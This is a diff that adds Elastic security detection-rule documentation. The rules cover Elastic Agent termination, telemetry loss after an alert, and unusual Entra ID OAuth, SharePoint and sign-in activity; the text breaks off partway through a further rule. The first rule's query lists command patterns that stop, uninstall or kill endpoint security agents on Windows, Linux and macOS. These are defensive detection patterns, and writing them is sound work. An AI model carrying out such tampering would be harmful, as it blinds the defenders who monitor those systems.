investigate potential causes such as corrupted files or missing dependencies. +- Conduct a thorough review of recent process execution logs on the affected host to identify any unauthorized or suspicious activities that may have led to the termination of the Elastic Agent. +- If malicious activity is confirmed, perform a comprehensive malware scan and remove any identified threats. Ensure that the host is clean before reconnecting it to the network. +- Review and update endpoint security configurations to prevent unauthorized termination of security services. This may include implementing stricter access controls or using application whitelisting. +- Escalate the incident to the security operations team for further analysis and to determine if additional hosts are affected or if there is a broader security incident underway. +- Document the incident, including all actions taken and findings, to enhance future response efforts and update incident response plans as necessary. + +==== Setup + + + +*Setup* + + +This rule is designed for data generated by https://www.elastic.co/security/endpoint-security[Elastic Defend], which provides native endpoint detection and response, along with event enrichments designed to work with our detection rules. + +Setup instructions: https://ela.st/install-elastic-defend + + +==== Rule query + + +[source, js] +---------------------------------- +process where event.type == "start" and +( + /* net, sc or wmic stopping or deleting Elastic Agent on Windows */ + ( + process.name : ("net.exe", "sc.exe", "wmic.exe", "powershell.exe", "taskkill.exe", "PsKill.exe", "ProcessHacker.exe") and + process.args : ("stopservice", "uninstall", "stop", "disabled", "Stop-Process", "terminate", "suspend") and + process.args : ("elasticendpoint", "Elastic Agent", "elastic-agent", "elastic-endpoint") + ) or + + /* direct uninstallation of Elastic Agent or Elastic Endpoint on Windows */ + ( + host.os.type == "windows" and + process.name : ("elastic-agent.exe", "endpoint-security.exe", "elastic-endpoint.exe") and + process.args : "uninstall" and + /* exclude legitimate Elastic-managed reinstall, upgrade, and uninstall subprocesses */ + not ( + process.parent.code_signature.trusted == true and + process.parent.code_signature.subject_name == "Elasticsearch, Inc." and + ( + ( + process.name : "elastic-agent.exe" and process.args : "--force" and + process.parent.name : "elastic-agent.exe" and process.parent.args : "install" and + process.parent.args : ("--force", "-f") + ) or + ( + process.parent.name : "endpoint-security.exe" and + process.executable : "*\\components\\previous\\elastic-endpoint.exe" and + process.args : "--keepstate" and process.parent.args : "--upgrade" + ) or + ( + process.name : "endpoint-security.exe" and process.parent.name : "elastic-agent.exe" and + process.parent.args : "uninstall" + ) + ) + ) + ) or + + /* service or systemctl used to stop Elastic Agent on Linux */ + ( + process.name in ("systemctl", "service", "chkconfig", "update-rc.d") and + process.args : ("elastic-agent", "elastic-agent.service", "ElasticEndpoint") and + process.args : ("stop", "disable", "remove", "off", "kill", "mask") and + not ( + process.parent.executable : "/opt/Elastic/Agent/data/elastic-agent-*/components/previous/elastic-endpoint" and + process.parent.args : "uninstall" and + process.parent.args : "--keepstate" + ) + ) or + + /* pkill, killall used to stop Elastic Agent or Endpoint on Linux */ + (process.name in ("pkill", "killall", "kill") and process.args : ("elastic-agent", "elastic-endpoint")) or + + /* Unload Elastic Defend extension on MacOS */ + (process.name : "kextunload" and process.args : "com.apple.iokit.EndpointSecurity") +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Service Stop +** ID: T1489 +** Reference URL: https://attack.mitre.org/techniques/T1489/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-elastic-defend-alert-followed-by-telemetry-loss.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-elastic-defend-alert-followed-by-telemetry-loss.asciidoc new file mode 100644 index 0000000000..68c6fca334 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-elastic-defend-alert-followed-by-telemetry-loss.asciidoc @@ -0,0 +1,131 @@ +[[prebuilt-rule-8-19-32-elastic-defend-alert-followed-by-telemetry-loss]] +=== Elastic Defend Alert Followed by Telemetry Loss + +Detects when an Elastic Defend endpoint alert is generated on a host and is not followed by any subsequent endpoint telemetry (process, network, registry, library, or DNS events) within a short time window. This behavior may indicate endpoint security evasion, agent tampering, sensor disablement, service termination, system crash, or malicious interference with telemetry collection following detection. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-14m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://attack.mitre.org/techniques/T1562/001/ + +*Tags*: + +* Domain: Endpoint +* Data Source: Elastic Defend +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Execution +* Rule Type: Higher-Order Rule +* Resources: Investigation Guide + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Elastic Defend Alert Followed by Telemetry Loss* + + +This rule identifies situations where an Elastic Defend alert is generated on a host and is not followed by +any normal endpoint activity events within a short time window. This may indicate agent tampering, sensor +disablement, host shutdown, system crash, or defense evasion behavior. + + +*Possible investigation steps* + + +- Review the original `endpoint.alert` event and identify the detection that triggered the alert. +- Check the host’s online status, uptime, and reboot history. +- Verify the health and status of the Elastic Defend agent and related services. +- Look for evidence of agent tampering, service stops, or security control modifications. +- Correlate with activity immediately preceding the alert for signs of exploitation or evasion. +- Determine if similar alert → silence patterns are occurring on other hosts. + + +*False positive analysis* + + +- Legitimate system reboots or shutdowns +- Network connectivity loss +- Elastic Agent upgrades or restarts +- Endpoint service crashes +- Maintenance or IT operations + + +*Response and remediation* + + +- Validate host and agent availability. +- Reconnect or re-enroll the agent if telemetry is missing. +- Isolate the host if malicious activity is suspected. +- Investigate for security control tampering. +- Perform broader environment hunting for similar patterns. + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id with maxspan=10m + [any where data_stream.dataset == "endpoint.alerts"] + ![any where event.category in ("process", "library", "registry", "network", "dns", "file")] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: User Execution +** ID: T1204 +** Reference URL: https://attack.mitre.org/techniques/T1204/ +* Sub-technique: +** Name: Malicious File +** ID: T1204.002 +** Reference URL: https://attack.mitre.org/techniques/T1204/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-entra-id-oauth-user-impersonation-scope-for-unusual-user-and-client.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-entra-id-oauth-user-impersonation-scope-for-unusual-user-and-client.asciidoc new file mode 100644 index 0000000000..15300b8e41 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-entra-id-oauth-user-impersonation-scope-for-unusual-user-and-client.asciidoc @@ -0,0 +1,184 @@ +[[prebuilt-rule-8-19-32-entra-id-oauth-user-impersonation-scope-for-unusual-user-and-client]] +=== Entra ID OAuth user_impersonation Scope for Unusual User and Client + +Identifies rare occurrences of OAuth workflow for a user principal that is single factor authenticated, with an OAuth scope containing user_impersonation for a token issued by Entra ID. Adversaries may use this scope to gain unauthorized access to user accounts, particularly when the sign-in session status is unbound, indicating that the session is not associated with a specific device or session. This behavior is indicative of potential account compromise or unauthorized access attempts. This rule flags when this pattern is detected for a user principal that has not been seen in the last 10 days, indicating potential abuse or unusual activity. + +*Rule type*: new_terms + +*Rule indices*: + +* filebeat-* +* logs-azure.signinlogs-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://aadinternals.com/post/phishing/ +* https://dirkjanm.io/assets/raw/Finding%20Entra%20ID%20CA%20Bypasses%20-%20the%20structured%20way.pdf +* https://github.com/Flangvik/TeamFiltration +* https://www.proofpoint.com/us/blog/threat-insight/attackers-unleash-teamfiltration-account-takeover-campaign + +*Tags*: + +* Domain: Cloud +* Domain: Identity +* Use Case: Threat Detection +* Data Source: Azure +* Data Source: Microsoft Entra ID +* Data Source: Microsoft Entra ID Sign-in Logs +* Platform: Entra ID +* Tactic: Initial Access +* Tactic: Defense Evasion +* Rule Type: New Terms +* Resources: Investigation Guide + +*Version*: 6 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Entra ID OAuth user_impersonation Scope for Unusual User and Client* + + +Identifies rare occurrences of OAuth workflow for a user principal that is single factor authenticated, with an OAuth scope containing `user_impersonation`, and a token issuer type of `AzureAD`. This rule is designed to detect suspicious +OAuth user impersonation attempts in Microsoft Entra ID, particularly those involving the `user_impersonation` scope, which is often used by adversaries to gain unauthorized access to user accounts. The rule focuses on sign-in events where +the sign-in session status is `unbound`, indicating that the session is not associated with a specific device or session, making it more vulnerable to abuse. This behavior is indicative of potential account compromise or +unauthorized access attempts, especially when the user type is `Member` and the sign-in outcome is `success`. The rule aims to identify these events to facilitate timely investigation and response to potential security incidents. This is a New Terms rule that flags when this pattern is detected for a user principal that has not been seen in the last 10 days, indicating potential abuse or unusual activity. + + +*Possible investigation steps* + + +- Review the `azure.signinlogs.properties.user_principal_name` field to identify the user principal involved in the OAuth workflow. +- Check the `azure.signinlogs.properties.authentication_processing_details.Oauth Scope Info` field for the presence of `user_impersonation`. This scope is commonly used in OAuth flows to allow applications to access user resources on behalf of the user. +- Confirm that the `azure.signinlogs.properties.authentication_requirement` is set to `singleFactorAuthentication`, indicating that the sign-in did not require multi-factor authentication (MFA). This can be a red flag, as MFA is a critical security control that helps prevent unauthorized access. +- Review the `azure.signinlogs.properties.app_display_name` or `azure.signinlogs.properties.app_id` to identify the application involved in the OAuth workflow. Check if this application is known and trusted, or if it appears suspicious or unauthorized. FOCI applications are commonly abused by adversaries to evade security controls or conditional access policies. +- Analyze the `azure.signinlogs.properties.client_ip` to determine the source of the sign-in attempt. Look for unusual or unexpected IP addresses, especially those associated with known malicious activity or geographic locations that do not align with the user's typical behavior. +- Examine the `azure.signinlogs.properties.resource_display_name` or `azure.signinlogs.properties.resource_id` to identify the resource being accessed during the OAuth workflow. This can help determine if the access was legitimate or if it targeted sensitive resources. It may also help pivot to other related events or activities. +- Use the `azure.signinlogs.properties.session_id` or `azure.signinlogs.properties.correlation_id` to correlate this event with other related sign-in events or activities. This can help identify patterns of suspicious behavior or potential account compromise. + + +*False positive analysis* + + +- Some legitimate applications may use the `user_impersonation` scope for valid purposes, such as accessing user resources on behalf of the user. If this is expected behavior, consider adjusting the rule or adding exceptions for specific applications or user principals. +- Users may occasionally authenticate using single-factor authentication for specific applications or scenarios, especially in environments where MFA is not enforced or required. If this is expected behavior, consider adjusting the rule or adding exceptions for specific user principals or applications. +- Some applications may use the `user_impersonation` scope for legitimate purposes, such as accessing user resources in a controlled manner. If this is expected behavior, consider adjusting the rule or adding exceptions for specific applications or user principals. +- The `restricted_user_impersonation` scope is distinct from `user_impersonation` and is excluded. +- Expected OCaaS bootstrap requests from Exchange Online or Microsoft Forms Web are excluded when they originate from compliant, managed, joined Windows devices and do not use an incoming refresh token or primary refresh token. + + +*Response and remediation* + + +- Contact the user to validate the OAuth workflow and assess whether they were targeted or tricked by a malicious actor. +- If the OAuth workflow is confirmed to be malicious: + - Block the user account and reset the password to prevent further unauthorized access. + - Revoke active sessions and refresh tokens associated with the user principal. + - Review the application involved in the OAuth workflow and determine if it should be blocked or removed from the tenant. + - Investigate the source of the sign-in attempt, including the application and IP address, to determine if there are any additional indicators of compromise or ongoing malicious activity. + - Monitor the user account and related resources for any further suspicious activity or unauthorized access attempts, and take appropriate actions to mitigate any risks identified. +- Educate users about the risks associated with OAuth user impersonation and encourage them to use more secure authentication methods, such as OAuth 2.0 or OpenID Connect, whenever possible. + + +==== Rule query + + +[source, js] +---------------------------------- +data_stream.dataset:azure.signinlogs and +azure.signinlogs.properties.authentication_processing_details:(*user_impersonation* and not *restricted_user_impersonation*) and +azure.signinlogs.properties.authentication_requirement:singleFactorAuthentication and +azure.signinlogs.properties.token_issuer_type:AzureAD and +azure.signinlogs.properties.token_protection_status_details.sign_in_session_status:unbound and +azure.signinlogs.properties.user_type:Member and +azure.signinlogs.properties.conditional_access_status:"notApplied" and +not user_agent.original:(Microsoft*Authentication*iPhone* or Mozilla*PKeyAuth/1.0) and +not azure.signinlogs.properties.device_detail.operating_system:(Android* or Ios*) and +event.outcome:success and +not azure.signinlogs.properties.app_id:( + 0000000c-0000-0000-c000-000000000000 or + 0a5f63c0-b750-4f38-a71c-4fc0d58b89e2 or + 48af08dc-f6d2-435f-b2a7-069abd99c086 or + 5e3ce6c0-2b1f-4285-8d4b-75ee78787346 or + 65d91a3d-ab74-42e6-8a2f-0add61688c74 or + 66a88757-258c-4c72-893c-3e8bed4d6899 or + 6bc3b958-689b-49f5-9006-36d165f30e00 or + 8c59ead7-d703-4a27-9e55-c96a0054c8d2 or + 95de633a-083e-42f5-b444-a4295d8e9314 or + ab9b8c07-8f02-4f72-87fa-80105867a763 or + cc15fd57-2c6c-4117-a88c-83b1d56b4bbe or + d52792f4-ba38-424d-8140-ada5b883f293 or + e8be65d6-d430-4289-a665-51bf2a194bda or + fc0f3af4-6835-4174-b806-f7db311fd2f3 +) and +not ( + azure.signinlogs.properties.resource_id:c2ada927-a9e2-4564-aae2-70775a2fa0af and + ( + azure.signinlogs.properties.app_id:00000002-0000-0ff1-ce00-000000000000 and + azure.signinlogs.properties.device_detail.operating_system:Windows or + azure.signinlogs.properties.app_id:5f00fd34-f302-417f-81ef-1adda179d8fd and + azure.signinlogs.properties.device_detail.operating_system:Windows* + ) and + azure.signinlogs.properties.device_detail.is_managed:true and + azure.signinlogs.properties.device_detail.is_compliant:true and + azure.signinlogs.properties.device_detail.trust_type:("Azure AD joined" or "Hybrid Azure AD joined") and + azure.signinlogs.properties.device_detail.device_id:(* and not "") and + azure.signinlogs.properties.incoming_token_type:none and + azure.signinlogs.properties.client_app_used:Browser and + azure.signinlogs.category:NonInteractiveUserSignInLogs +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Use Alternate Authentication Material +** ID: T1550 +** Reference URL: https://attack.mitre.org/techniques/T1550/ +* Sub-technique: +** Name: Application Access Token +** ID: T1550.001 +** Reference URL: https://attack.mitre.org/techniques/T1550/001/ +* Technique: +** Name: Impersonation +** ID: T1656 +** Reference URL: https://attack.mitre.org/techniques/T1656/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-entra-id-sharepoint-or-onedrive-accessed-by-unusual-client.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-entra-id-sharepoint-or-onedrive-accessed-by-unusual-client.asciidoc new file mode 100644 index 0000000000..b13e3a495a --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-entra-id-sharepoint-or-onedrive-accessed-by-unusual-client.asciidoc @@ -0,0 +1,185 @@ +[[prebuilt-rule-8-19-32-entra-id-sharepoint-or-onedrive-accessed-by-unusual-client]] +=== Entra ID Sharepoint or OneDrive Accessed by Unusual Client + +Identifies when an application accesses SharePoint Online or OneDrive for Business for the first time in the tenant within a specified timeframe. This detects successful OAuth phishing campaigns, illicit consent grants, or compromised third-party applications gaining initial access to file storage. Adversaries often use malicious OAuth applications or phishing techniques to gain consent from users, allowing persistent access to organizational data repositories without traditional credential theft. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-azure.signinlogs-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.volexity.com/blog/2025/04/22/phishing-for-codes-russian-threat-actors-target-microsoft-365-oauth-workflows/ +* https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/ +* https://learn.microsoft.com/en-us/entra/identity/enterprise-apps/manage-consent-requests +* https://github.com/merill/microsoft-info/blob/main/_info/MicrosoftApps.json + +*Tags*: + +* Domain: Cloud +* Domain: Identity +* Domain: Storage +* Use Case: Identity and Access Audit +* Tactic: Collection +* Tactic: Initial Access +* Data Source: Azure +* Data Source: Microsoft Entra ID +* Data Source: Microsoft Entra ID Sign-in Logs +* Resources: Investigation Guide +* Rule Type: New Terms + +*Version*: 7 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Entra ID Sharepoint or OneDrive Accessed by Unusual Client* + + +This rule identifies when an application accesses SharePoint Online or OneDrive for Business for the first time in the tenant. This is a critical signal for detecting successful OAuth phishing campaigns, where adversaries trick users into granting consent to malicious applications. Once consent is granted, the malicious app can persistently access file storage without further user interaction. This detection also catches illicit consent grants, compromised third-party applications, or custom malicious apps registered by adversaries. + + +*Possible Investigation Steps:* + + +- Identify the Application: Review `azure.signinlogs.properties.app_id` and `azure.signinlogs.properties.app_display_name` to determine which application accessed SharePoint. Cross-reference with known legitimate applications in your environment. +- Check Application Registration: Search Entra ID app registrations for the app ID. Determine if it's a first-party Microsoft app, known third-party integration, or suspicious/unknown application. +- Review Consent History: Investigate when and how consent was granted. Check `azure.auditlogs` for recent `Consent to application` events matching this app ID. Identify which user granted consent and whether it was admin or user consent. +- Analyze Permissions Granted: Review the OAuth scopes and permissions granted to the application. Look for overly broad permissions (e.g., `Files.ReadWrite.All`, `Sites.ReadWrite.All`) that exceed business requirements. +- Correlate with User Activity: Check if the user who granted consent recently received phishing emails, clicked suspicious links, or reported potential phishing attempts. +- Inspect Source IP and Location: Review `source.ip` and `source.geo.*` fields. Determine if the sign-in originated from expected locations or suspicious infrastructure (VPNs, data centers, anonymizers). +- Review Application Publisher: Check if the application is verified by Microsoft or has a suspicious/generic publisher name. Unverified applications with generic names (e.g., "File Viewer", "Document Manager") are common in phishing. +- Check for Data Access: Review subsequent SharePoint audit logs to see what files/sites the application accessed after gaining consent. +- Conditional Access Evaluation: Review `azure.signinlogs.properties.applied_conditional_access_policies` to determine if any security controls were bypassed or if the application should have been blocked. + + +*False Positive Analysis* + + +- New Legitimate Integrations: Newly deployed third-party SaaS applications (e.g., document management, collaboration tools) that integrate with SharePoint will trigger this detection during initial setup. Validate with IT/procurement teams. +- Microsoft First-Party Applications: This rule excludes known SharePoint, OneDrive, Outlook Web, and Teams web or service clients that commonly access SharePoint. It also excludes service-principal sign-ins when the application is owned by Microsoft's tenant. User sign-ins from reusable first-party clients such as Outlook Mobile, Microsoft Teams, and Microsoft Office remain detectable because adversaries can abuse these clients in OAuth phishing. +- Development/Testing: Developers testing OAuth flows or building internal applications may generate alerts in development or staging environments. +- Organizational Changes: Mergers, acquisitions, or tenant migrations may introduce legitimate applications from partner organizations accessing SharePoint for the first time. + + +*Response and Remediation* + + +- Immediate Actions if Malicious: + - Revoke consent for the malicious application immediately via Entra ID > Enterprise Applications + - Revoke all active sessions and refresh tokens for affected users + - Disable the application's service principal to prevent further access + - Review and remediate any data accessed by the application using SharePoint audit logs +- User Notification: Contact users who granted consent to inform them of the phishing attempt and provide security awareness training on identifying malicious OAuth consent requests +- Conditional Access Hardening: Implement or strengthen Conditional Access policies to: + - Require admin consent for high-risk permissions (Files.ReadWrite.All, Sites.ReadWrite.All) + - Block unverified publishers from accessing sensitive resources + - Enforce device compliance and MFA for application access +- Tenant-Wide Review: Audit all application consents across the tenant to identify other potentially malicious applications that may have gained access through similar campaigns +- Monitor for Campaign Patterns: Check if the same malicious application targeted multiple users, indicating an organized phishing campaign. Coordinate with email security teams to identify and block phishing emails used in the campaign. + + + +==== Setup + + + +*Required Microsoft Entra ID Sign-In Logs* + +To use this rule, ensure that Microsoft Entra ID Sign-In Logs are being collected and streamed into the Elastic Stack via the Azure integration. + + +==== Rule query + + +[source, js] +---------------------------------- +data_stream.dataset:azure.signinlogs and +azure.signinlogs.properties.resource_id:( + 00000003-0000-0ff1-ce00-000000000000 or + 6a9b9266-8161-4a7b-913a-a9eda19da220 +) and +azure.signinlogs.properties.app_id:(* and not ( + 00000003-0000-0ff1-ce00-000000000000 or + 08e18876-6177-487e-b8b5-cf950c1e598c or + 5e3ce6c0-2b1f-4285-8d4b-75ee78787346 or + 9199bf20-a13f-4107-85dc-02114787ef48 or + ab9b8c07-8f02-4f72-87fa-80105867a763 or + af124e86-4e96-495a-b70a-90f90ab96707 or + cc15fd57-2c6c-4117-a88c-83b1d56b4bbe +)) and +not ( + azure.signinlogs.properties.app_owner_tenant_id:f8cdef31-a31e-4b4a-93e4-5f571e91255a and + azure.signinlogs.category:MicrosoftServicePrincipalSignInLogs +) and +azure.signinlogs.properties.tenant_id:* and +event.outcome:success + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Collection +** ID: TA0009 +** Reference URL: https://attack.mitre.org/tactics/TA0009/ +* Technique: +** Name: Data from Information Repositories +** ID: T1213 +** Reference URL: https://attack.mitre.org/techniques/T1213/ +* Sub-technique: +** Name: Sharepoint +** ID: T1213.002 +** Reference URL: https://attack.mitre.org/techniques/T1213/002/ +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ +* Technique: +** Name: Phishing +** ID: T1566 +** Reference URL: https://attack.mitre.org/techniques/T1566/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Sub-technique: +** Name: Additional Cloud Credentials +** ID: T1098.001 +** Reference URL: https://attack.mitre.org/techniques/T1098/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-entra-id-user-sign-in-with-unusual-authentication-type.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-entra-id-user-sign-in-with-unusual-authentication-type.asciidoc new file mode 100644 index 0000000000..c0edee09a2 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-entra-id-user-sign-in-with-unusual-authentication-type.asciidoc @@ -0,0 +1,157 @@ +[[prebuilt-rule-8-19-32-entra-id-user-sign-in-with-unusual-authentication-type]] +=== Entra ID User Sign-in with Unusual Authentication Type + +Identifies rare instances of authentication methods for Microsoft Entra ID principal users. An adversary with stolen credentials may attempt to authenticate with an unusual method, which may indicate an attempt to bypass conditional access policies (CAP) and multi-factor authentication (MFA) requirements. The authentication method may not be commonly used by the user based on their historical sign-in activity. + +*Rule type*: new_terms + +*Rule indices*: + +* filebeat-* +* logs-azure.signinlogs-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Data Source: Microsoft Entra ID +* Data Source: Microsoft Entra ID Sign-in Logs +* Platform: Entra ID +* Use Case: Identity and Access Audit +* Use Case: Threat Detection +* Tactic: Initial Access +* Resources: Investigation Guide + +*Version*: 9 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Entra ID User Sign-in with Unusual Authentication Type* + + +Identifies rare instances of authentication methods for Microsoft Entra ID principal users. An adversary with stolen credentials may attempt to authenticate with an unusual method, which may indicate an attempt to bypass conditional access policies (CAP) and multi-factor authentication (MFA) requirements. The authentication method may not be commonly used by the user based on their historical sign-in activity. + +**This is a New Terms rule that focuses on the first occurrence of an Entra ID principal user `azure.signinlogs.properties.user_principal_name` and their authentication method `azure.signinlogs.properties.authentication_details.authentication_method` in the last 14 days.** + + +*Possible investigation steps* + + +- Identify the source IP address by reviewing `source.ip`. Determine whether it is associated with known malicious activity, an unexpected location or hosting provider, or approved corporate infrastructure. +- Review `azure.signinlogs.properties.user_principal_name` to determine whether the account is privileged or otherwise high value, and compare the sign-in with the user's recent activity. +- Examine `azure.signinlogs.properties.authentication_details.authentication_method` and determine whether the method is expected for the user. Review recent authentication-method registration or modification events. +- Review `azure.signinlogs.properties.app_id`, `azure.signinlogs.properties.client_app_used`, and the target resource to determine whether the application and access pattern are expected. +- Examine device, browser, user-agent, authentication protocol, and token details for signs of an unfamiliar client or session. +- Review `azure.signinlogs.properties.authentication_requirement` and the applicable conditional access policies to determine why the sign-in did not require MFA. + + +*False positive analysis* + + + +*Common benign scenarios* + +- Users enrolling in or switching to a different authentication method may trigger this detection the first time the method is observed. +- Automated scripts or applications using non-interactive authentication may trigger this detection, particularly if they rely on legacy authentication protocols recorded in `azure.signinlogs.properties.authentication_protocol`. +- Changes to an organization's authentication or conditional access policies may cause a previously unseen authentication method to be recorded for a user. + + +*How to reduce false positives* + +- Exclude known trusted IPs, such as corporate infrastructure, from alerts by filtering `source.ip`. +- Exclude known custom applications from `azure.signinlogs.properties.app_id` that are authorized to use non-interactive authentication. +- Correlate alerts with approved authentication-method enrollment or policy changes before adding exceptions. + + +*Response and remediation* + + + +*Immediate actions* + +- Block the source IP address in `source.ip` if determined to be malicious. +- If the sign-in is unauthorized, disable the affected account, revoke active sessions and tokens, and reset its credentials. +- Ensure basic authentication is disabled for all applications using legacy authentication protocols listed in `azure.signinlogs.properties.authentication_protocol`. +- Enable multi-factor authentication (MFA) for impacted accounts to mitigate credential-based attacks. +- Review conditional access policies to enforce risk-based authentication and block unauthorized access recorded in `azure.signinlogs.properties.authentication_requirement`. + + +*Long-term mitigation* + +- Implement a zero-trust security model by enforcing least privilege access and continuous authentication. +- Regularly review and update conditional access policies to ensure they are effective against evolving threats. +- Restrict the use of legacy authentication protocols by disabling authentication methods listed in `azure.signinlogs.properties.client_app_used`. +- Regularly audit authentication logs in `azure.signinlogs` to detect abnormal login behavior and ensure early detection of potential attacks. +- Regularly rotate client credentials and secrets for applications using non-interactive authentication to reduce the risk of credential theft. + + +==== Rule query + + +[source, js] +---------------------------------- +data_stream.dataset: "azure.signinlogs" and event.category: "authentication" + and azure.signinlogs.properties.user_type: "Member" + and not azure.signinlogs.properties.device_detail.browser: * + and not source.as.organization.name: "MICROSOFT-CORP-MSN-AS-BLOCK" + and not azure.signinlogs.properties.authentication_requirement: "multiFactorAuthentication" + and azure.signinlogs.properties.authentication_details.authentication_method:* + and event.outcome:success + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Use Alternate Authentication Material +** ID: T1550 +** Reference URL: https://attack.mitre.org/techniques/T1550/ +* Technique: +** Name: Modify Authentication Process +** ID: T1556 +** Reference URL: https://attack.mitre.org/techniques/T1556/ +* Sub-technique: +** Name: Multi-Factor Authentication +** ID: T1556.006 +** Reference URL: https://attack.mitre.org/techniques/T1556/006/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-entra-id-user-sign-in-with-unusual-client.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-entra-id-user-sign-in-with-unusual-client.asciidoc new file mode 100644 index 0000000000..1bb7b1424e --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-entra-id-user-sign-in-with-unusual-client.asciidoc @@ -0,0 +1,256 @@ +[[prebuilt-rule-8-19-32-entra-id-user-sign-in-with-unusual-client]] +=== Entra ID User Sign-in with Unusual Client + +Detects rare non-interactive sign-ins where an Entra ID client application authenticates on behalf of a principal user using an application (client) ID that is not commonly associated with that user's historical 